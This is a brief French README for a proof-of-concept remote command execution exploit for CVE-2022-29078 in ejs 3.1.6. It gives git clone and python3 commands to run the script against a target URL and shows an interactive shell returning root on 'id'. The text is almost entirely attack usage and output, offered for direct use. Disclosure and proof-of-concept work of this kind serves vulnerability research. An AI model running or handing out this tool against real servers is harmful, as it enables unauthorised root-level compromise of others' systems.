
Exploit de preuve de concept pour CVE-2022-29078 (ejs 3.1.6) permettant l'exécution de commandes à distance via un script Python. Accepte une URL cible et fournit un shell interactif.
PoC simple pour CVE-2022-29078 (vulnérabilité ejs 3.1.6)
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
Une invite apparaîtra pour exécuter des commandes
$ id
uid=0(root) gid=0(root) groupes=0(root)